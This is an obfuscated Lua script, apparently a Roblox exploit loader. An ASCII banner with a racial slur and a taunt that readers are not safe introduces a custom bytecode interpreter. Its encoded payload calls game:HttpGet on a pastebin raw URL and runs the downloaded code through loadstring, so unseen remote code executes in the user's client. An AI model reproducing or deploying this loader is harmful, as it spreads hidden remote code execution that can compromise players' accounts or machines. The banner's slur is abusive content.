--[[


 ▄▀▀▄▀▀▀▄  ▄▀▀▄▀▀▀▄  ▄▀▀▄ ▄▄     ▄▀▄▄▄▄   ▄▀▄▄▄▄  
█   █   █ █   █   █ █  █   ▄▀   █ █    ▌ █ █    ▌ 
▐  █▀▀▀▀  ▐  █▀▀▀▀  ▐  █▄▄▄█    ▐ █      ▐ █      
   █         █         █   █      █        █      
 ▄▀        ▄▀         ▄▀  ▄▀  ▄  ▄▀▄▄▄▄▀  ▄▀▄▄▄▄▀ 
 
  YALL NIGGAS AINT SAFE <3....                                                        MADE BY SAINTLY..

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (7==v18) then function v30(v31,v32,v33)local v34=v31[1];local v35=v31[2];local v36=v31[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v12("#",...) -1 ;local function v72()local v73=v34;local v74=v35;local v75=v36;local v76=v28;local v77={};local v78={};local v79={};for v87=0 -0 ,v71 do if ((v87>=v75) or ((4664 -3034)>(8103 -3905))) then v77[v87-v75 ]=v70[v87 + (2 -1) ];else v79[v87]=v70[v87 + (620 -((1163 -608) + 64)) ];end end local v80=(v71-v75) + ((2194 -(1091 + 171)) -(857 + 74)) ;local v81;local v82;while true do local v88=568 -(367 + 201) ;while true do if (((1981 -(214 + 115 + 598))==(264 + 790)) and (v88==(1 + 0))) then if ((v82<=(879 -(282 + 595))) or (676>=((10323 -7044) -(1523 + (377 -263))))) then if (((3717 + 419)>(3417 -1020)) and (v82<=(1065 -(68 + 997)))) then do return;end elseif ((v82==(1271 -(226 + 1044))) or ((18871 -14537)==(4362 -(32 + 85)))) then v79[v81[2 + 0 ]]=v33[v81[1 + 2 ]];else v79[v81[2]]=v81[3];end elseif ((v82<=4) or ((5233 -(892 + 65))<=(7230 -4199))) then if ((v82>(377 -(123 + 251))) or ((8838 -4056)<=1199)) then local v110=0 -0 ;local v111;local v112;local v113;local v114;local v115;local v116;while true do if ((v110==(0 -0)) or ((5214 -(87 + 263))<(2082 -(67 + 113)))) then v111=(698 -(208 + 490)) + 0 ;v112=nil;v110=2 -1 ;end if (((3559 + 1280)>=(14705 -11005)) and (1==v110)) then v113=nil;v114=nil;v110=954 -(802 + 150) ;end if ((v110==(7 -(1 + 3))) or ((1950 -875)>1918)) then while true do if (((289 + 107)<=(4801 -(915 + 82))) and (v111==0)) then v112=0;v113=nil;v111=2 -1 ;end if ((v111==(1 + 0 + 0)) or (((6318 -(660 + 176)) -1313)==(3374 -(1069 + 118)))) then v114=nil;v115=nil;v111=4 -2 ;end if (((169 + 1237)==1406) and (v111==2)) then v116=nil;while true do if (((3348 -1817)<(743 + 3528)) and (v112==((205 -(14 + 188)) -1))) then for v144=v113,v69 do local v145=0 + 0 ;while true do if ((635==(1426 -(368 + 423))) and ((0 -(675 -(534 + 141)))==v145)) then v116=v116 + 1 ;v79[v144]=v114[v116];break;end end end break;end if ((3373<=(3574 -(5 + 5 + 8))) and (v112==(0 -0))) then local v141=442 -(368 + 48 + 26) ;local v142;while true do if ((v141==(0 -0)) or ((1413 + 1878)<(5803 -2523))) then v142=438 -(145 + 293) ;while true do if (((4816 -(44 + 372 + 14))>=(2359 -(998 + 488))) and (0==v142)) then local v158=0 + 0 ;while true do if (((755 + 166)<=(1874 -(201 + 571))) and (v158==(1138 -((243 -127) + 1022)))) then v113=v81[8 -6 ];v114,v115=v76(v79[v113](v13(v79,v113 + 1 + 0 ,v81[3])));v158=3 -2 ;end if (((16711 -12005)>=(1822 -(814 + 45))) and (v158==(2 -1))) then v142=(1 -0) + 0 ;break;end end end if ((v142==(1 + 0)) or ((1845 -(261 + 624))<=((4364 -2808) -680))) then v112=1081 -(548 + 472 + 60) ;break;end end break;end end end if ((v112==(1424 -(630 + 793))) or ((7000 -4934)==((2810 + 1602) -3480))) then local v143=0 + 0 ;while true do if (((16612 -11787)<(6590 -(760 + 987))) and (v143==(1913 -(1789 + 124)))) then v69=(v115 + v113) -1 ;v116=766 -(745 + 21) ;v143=1 + 0 ;end if ((v143==(2 -1)) or ((15207 -11330)>=4537)) then v112=1 + 1 ;break;end end end end break;end end break;end if ((v110==(2 + 0)) or ((5370 -(87 + 968))<(7597 -5871))) then v115=nil;v116=nil;v110=3 + (396 -(115 + 281)) ;end end else v79[v81[4 -2 ]]();end elseif ((v82>5) or ((5092 -(447 + 966))<((3979 -2268) -1086))) then local v117=1817 -(1410 + 293 + 114) ;local v118;local v119;local v120;while true do if ((v117==(701 -(376 + 325))) or ((7579 -(7138 -4184))<(1944 -1312))) then v118=0;v119=nil;v117=1 + 0 ;end if ((v117==(2 -1)) or ((97 -(9 + 5))>(6526 -4746))) then v120=nil;while true do if (((922 -(85 + 291))<=(1944 -(550 + 317))) and (v118==(1266 -(243 + (1476 -454))))) then v79[v119 + ((3 -0) -(5 -3)) ]=v120;v79[v119]=v120[v81[4 + (285 -(134 + 151)) ]];break;end if (((1180 -(1123 + 57))==v118) or ((811 + 185)>(4555 -(163 + 91)))) then v119=v81[(3597 -(970 + 695)) -(1869 + 61) ];v120=v79[v81[1 + 2 ]];v118=(5 -2) -2 ;end end break;end end else local v121=0 -0 ;local v122;while true do if (((557 + 3513)>(944 -257)) and (v121==0)) then v122=v81[2 + 0 ];v79[v122]=v79[v122](v13(v79,v122 + (1991 -(582 + 1408)) ,v69));break;end end end v68=v68 + (1475 -(1329 + 145)) ;break;end if ((v88==(971 -(140 + 831))) or (656>=(5180 -(1409 + 441)))) then local v99=718 -(15 + 703) ;while true do if ((v99==(0 + 0)) or (2492<=(773 -(262 + 176)))) then v81=v73[v68];v82=v81[1722 -(345 + 1376) ];v99=689 -((686 -488) + 490) ;end if (((19094 -14772)>=2562) and (v99==(2 -1))) then v88=1207 -(696 + 510) ;break;end end end end end end A,B=v28(v11(v72));if  not A[1] then local v89=v31[4][v68] or "?" ;error("Script error at ["   .. v89   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v37,v38,v39)if v39 then local v83=(v37/((2 -0)^(v38-((1003 -(451 + 549)) -2))))%((1826 -(378 + 817 + 629))^(((v39-(1 -0)) -(v38-(242 -(187 + 54)))) + (781 -((251 -89) + (1038 -420))))) ;return v83-(v83%(1 + 0)) ;else local v84=0 + 0 ;local v85;while true do if ((0 -0)==v84) then v85=2^(v38-(1 -0)) ;return (((v37%(v85 + v85))>=v85) and (1 + 0)) or ((3020 -(746 + 638)) -(1373 + 263)) ;end end end end v22=nil;v18=2;end if (v18==2) then function v22()local v40=v1(v16,v19,v19);v19=v19 + 1 ;return v40;end v23=nil;function v23()local v41=0 + 0 ;local v42;local v43;while true do if (v41==((1468 -(899 + 568)) -0)) then return (v43 * (816 -(306 + 254))) + v42 ;end if (v41==(0 + 0)) then v42,v43=v1(v16,v19,v19 + (343 -(218 + 123)) );v19=v19 + 2 ;v41=1582 -(1535 + 46) ;end end end v18=3;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==3) then v24=nil;function v24()local v44=0 + 0 ;local v45;local v46;local v47;local v48;while true do if (v44==(0 -0)) then v45,v46,v47,v48=v1(v16,v19,v19 + 3 );v19=v19 + (607 -(268 + 335)) ;v44=1;end if (v44==(291 -((1516 -(282 + 1174)) + 230))) then return (v48 * (16777788 -(426 + (957 -(569 + 242))))) + (v47 * (7851 + 57685)) + (v46 * 256) + v45 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v49=0 -0 ;local v50;local v51;local v52;local v53;local v54;local v55;local v56;while true do if (v49==(5 -3)) then v54=nil;v55=nil;v49=3;end if (v49~=(1 + 0)) then else v52=nil;v53=nil;v49=379 -(142 + 235) ;end if (v49~=(0 -0)) then else v50=0 -0 ;v51=nil;v49=1206 -(902 + 303) ;end if (v49==3) then v56=nil;while true do local v90=0 -0 ;while true do if (v90~=(0 -0)) then else if (v50~=(1 + 0)) then else local v102=0 + 0 ;local v103;while true do if (v102~=(977 -(553 + 424))) then else v103=0 -0 ;while true do if (v103~=(0 + 0)) then else local v126=0 + 0 ;while true do if (v126==(0 + 0)) then v55=v24();v56={};v126=1;end if (v126==1) then v103=1 + 0 ;break;end end end if (v103~=(2 + 0)) then else v50=4 -2 ;break;end if (v103==1) then for v128=2 -1 ,v55 do local v129=0 -0 ;local v130;local v131;local v132;local v133;while true do if (v129==(1 + 0)) then v132=nil;v133=nil;v129=9 -7 ;end if ((755 -(239 + 514))==v129) then while true do if (v130~=(0 + 0)) then else v131=0;v132=nil;v130=1;end if (v130~=1) then else v133=nil;while true do if (v131~=(1329 -(797 + 532))) then else local v156=0 + 0 ;while true do if (v156==(0 -0)) then local v159=0 + 0 ;local v160;while true do if (v159==(0 -0)) then v160=1202 -(373 + 829) ;while true do if (v160~=0) then else local v167=731 -(476 + 255) ;while true do if (v167~=(1131 -(369 + 761))) then else v160=1;break;end if (v167~=(0 + 0)) then else v132=v22();v133=nil;v167=1;end end end if (v160~=(1 -0)) then else v156=1 -0 ;break;end end break;end end end if (v156~=(239 -(64 + 174))) then else v131=1 + 0 ;break;end end end if (1==v131) then if (v132==1) then v133=v22()~=(0 -0) ;elseif (v132==(2 -0)) then v133=v25();elseif (v132~=(1 + 2)) then else v133=v26();end v56[v128]=v133;break;end end break;end end break;end if (v129~=0) then else v130=336 -(144 + 192) ;v131=nil;v129=2 -1 ;end end end v54[219 -(42 + 174) ]=v22();v103=2 + 0 ;end end break;end end end if (v50==(0 + 0)) then v51={};v52={};v53={};v54={v51,v52,nil,v53};v50=1505 -(363 + 1141) ;end v90=1581 -(1183 + 397) ;end if (v90~=1) then else if (v50~=(2 -0)) then else local v104=0 -0 ;local v105;while true do if (v104==0) then v105=163 -(92 + 71) ;while true do local v123=0 + 0 ;while true do if (0~=v123) then else if (v105==(0 + 0)) then local v139=1975 -(1913 + 62) ;while true do if (v139==(0 -0)) then for v146=1 + 0 ,v24() do local v147=0 -0 ;local v148;local v149;while true do if (v147==(766 -(574 + 191))) then while true do if (v148~=(0 + 0)) then else v149=v22();if (v21(v149,2 -1 ,1)==(0 + 0)) then local v162=1933 -(565 + 1368) ;local v163;local v164;local v165;local v166;while true do if (v162==1) then v165=nil;v166=nil;v162=2;end if (v162~=(849 -(254 + 595))) then else v163=0;v164=nil;v162=127 -(55 + 71) ;end if (v162==(7 -5)) then while true do if ((1792 -(573 + 1217))==v163) then local v168=0 -0 ;while true do if (v168~=(0 + 0)) then else if (v21(v165,1662 -(1477 + 184) ,1)==(940 -(714 + 225))) then v166[2 -0 ]=v56[v166[2 + 0 ]];end if (v21(v165,2,2)~=(857 -(564 + 292))) then else v166[3]=v56[v166[3]];end v168=1;end if (v168~=1) then else v163=3 -0 ;break;end end end if (v163~=(0 -0)) then else local v169=0 -0 ;while true do if (v169~=(305 -(244 + 60))) then else v163=1 + 0 ;break;end if (v169~=(806 -(118 + 688))) then else v164=v21(v149,50 -(25 + 23) ,1 + 2 );v165=v21(v149,4,482 -(41 + 435) );v169=1002 -(938 + 63) ;end end end if (v163~=3) then else if (v21(v165,3 + 0 ,10 -7 )==(1126 -(936 + 189))) then v166[2 + 2 ]=v56[v166[1617 -(1565 + 48) ]];end v51[v146]=v166;break;end if (v163~=(1 + 0)) then else v166={v23(),v23(),nil,nil};if (v164==0) then local v173=0;local v174;local v175;while true do if (v173~=1) then else while true do if (v174~=0) then else v175=285 -(175 + 110) ;while true do if (v175==(0 -0)) then v166[4 -1 ]=v23();v166[1096 -(975 + 117) ]=v23();break;end end break;end end break;end if (v173==(0 -0)) then v174=0;v175=nil;v173=1876 -(157 + 1718) ;end end elseif (v164==(1797 -(503 + 1293))) then v166[3 + 0 ]=v24();elseif (v164==2) then v166[3]=v24() -((6 -4)^(54 -38)) ;elseif (v164~=3) then else local v182=1018 -(697 + 321) ;local v183;while true do if ((0 -0)==v182) then v183=0 -0 ;while true do if (v183~=(0 -0)) then else v166[2 + 1 ]=v24() -((3 -1)^16) ;v166[15 -11 ]=v23();break;end end break;end end end v163=5 -3 ;end end break;end end end break;end end break;end if ((1227 -(322 + 905))==v147) then v148=0 -0 ;v149=nil;v147=612 -(602 + 9) ;end end end for v150=1,v24() do v52[v150-1 ]=v29();end v139=1190 -(449 + 740) ;end if (v139~=(873 -(826 + 46))) then else v105=948 -(245 + 702) ;break;end end end if (v105==(3 -2)) then local v140=0 + 0 ;while true do if (v140==(0 + 0)) then for v152=1899 -(260 + 1638) ,v24() do v53[v152]=v24();end return v54;end end end break;end end end break;end end end break;end end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v57)if (v1(v57,2)==79) then v20=v0(v3(v57,1,1));return "";else local v86=v2(v0(v57,16));if v20 then local v91=v5(v86,v20);v20=nil;return v91;else return v86;end end end);v18=1;end if (v18==4) then function v25()local v58=v24();local v59=v24();local v60=4 -3 ;local v61=(v21(v59,3 -2 ,1759 -(404 + 1335) ) * (((133 + 275) -(183 + (2042 -(580 + 1239))))^(38 -(17 -11)))) + v58 ;local v62=v21(v59,14 + 7 ,12 + 19 );local v63=((v21(v59,369 -(10 + 327) )==(1 + 0)) and  -(339 -(113 + 5 + 220))) or (1 + 0) ;if (v62==0) then if (v61==(449 -(108 + 341))) then return v63 * (0 + 0) ;else v62=1;v60=0 -0 ;end elseif (v62==(3540 -(711 + 782))) then return ((v61==0) and (v63 * ((1 + 0)/0))) or (v63 * NaN) ;end return v8(v63,v62-1023 ) * (v60 + (v61/((3 -1)^(521 -(270 + 199))))) ;end v26=nil;function v26(v64)local v65=0;local v66;local v67;while true do if (v65==(0 + 0)) then v66=nil;if  not v64 then local v98=0 -0 ;while true do if (v98==0) then v64=v24();if (v64==(0 + 0)) then return "";end break;end end end v65=1;end if (v65==((2961 -1791) -(645 + 522))) then return v6(v67);end if (v65==(1792 -(1010 + 780))) then v67={};for v92=1 + 0 , #v66 do v67[v92]=v2(v1(v3(v66,v92,v92)));end v65=14 -(16 -5) ;end if (v65==1) then v66=v3(v16,v19,(v19 + v64) -((507 -(351 + 154)) -1) );v19=v19 + v64 ;v65=1838 -(1045 + (2365 -(1281 + 293))) ;end end end v18=5;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F434E704C6550685700083O0012013O00013O001201000100023O002006000100010003001202000300044O0004000100034O00055O00022O00033O000100016O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
